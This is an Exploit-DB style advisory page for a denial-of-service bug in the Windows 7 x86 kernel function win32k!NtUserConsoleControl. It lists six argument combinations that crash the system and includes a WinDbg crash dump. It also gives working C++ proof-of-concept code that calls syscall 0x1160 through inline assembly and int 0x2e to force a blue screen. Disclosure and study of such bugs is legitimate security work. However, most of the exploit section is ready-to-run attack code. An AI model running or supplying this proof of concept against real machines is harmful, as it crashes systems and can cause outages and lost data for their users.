Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)

vendor:

Windows

by:

vportal

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Windows

Affected Version From: Windows 7 x86

Affected Version To: Windows 7 x86

Patch Exists: NO

Related CWE:

CPE: o:microsoft:windows

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x86

2018

Microsoft Windows Kernel – ‘win32k!NtUserConsoleControl’ Denial of Service (PoC)

It is possible to trigger a BSOD caused by a Null pointer deference when calling the system call NtUserConsoleControl with the following arguments: NtUserControlConsole(1,0,8). NtUserControlConsole(4,0,8). NtUserControlConsole(6,0,12). NtUserControlConsole(2,0,12). NtUserControlConsole(3,0,20). NtUserControlConsole(5,0,8). Different crashes are reproduced for each case.

Mitigation:

No known mitigation

Source

Exploit-DB raw data:

/*
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
# Author: vportal
# Date: 2018-07-27
# Vendor homepage: http://www.microsoft.com
# Version: Windows 7 x86
# Tested on: Windows 7 x86
# CVE: N/A

# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system 
# call NtUserConsoleControl with the following arguments:

# NtUserControlConsole(1,0,8).
# NtUserControlConsole(4,0,8).
# NtUserControlConsole(6,0,12).
# NtUserControlConsole(2,0,12).
# NtUserControlConsole(3,0,20).
# NtUserControlConsole(5,0,8).

# Different crashes are reproduced for each case. For the second case the crash is showed below:
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria 
# en 0x%08lx. La memoria no se pudo %s.
# FAULTING_IP:
# win32k!xxxSetConsoleCaretInfo+c
# 93310641 8b0e            mov     ecx,dword ptr [esi]

# TRAP_FRAME:  8c747b2c -- (.trap 0xffffffff8c747b2c)
# ErrCode = 00000000
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0         nv up ei ng nz ac po nc
# cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010292
# win32k!xxxSetConsoleCaretInfo+0xc:
# 93310641 8b0e            mov     ecx,dword ptr [esi]  ds:0023:00000000=????????
# Resetting default scope

# CUSTOMER_CRASH_COUNT:  1
# DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT
# BUGCHECK_STR:  0x8E
# PROCESS_NAME:  Win32k-fuzzer_

# CURRENT_IRQL:  0
# LAST_CONTROL_TRANSFER:  from 9330fc27 to 93310641

# STACK_TEXT: 
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
# WARNING: Frame IP not in any known module. Following frames may be wrong.
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766

# PoC code:
*/

#include <Windows.h>

extern "C"

ULONG CDECL SystemCall32(DWORD ApiNumber, ...) 
{
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}


int _tmain(int argc, _TCHAR* argv[])
{

int st = 0;
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7

LoadLibrary(L"user32.dll");

st = (int)SystemCall32(syscall_ID, 4, 0, 8);

return 0;
}

# The vulnerability has only been tested  in Windows 7 x86.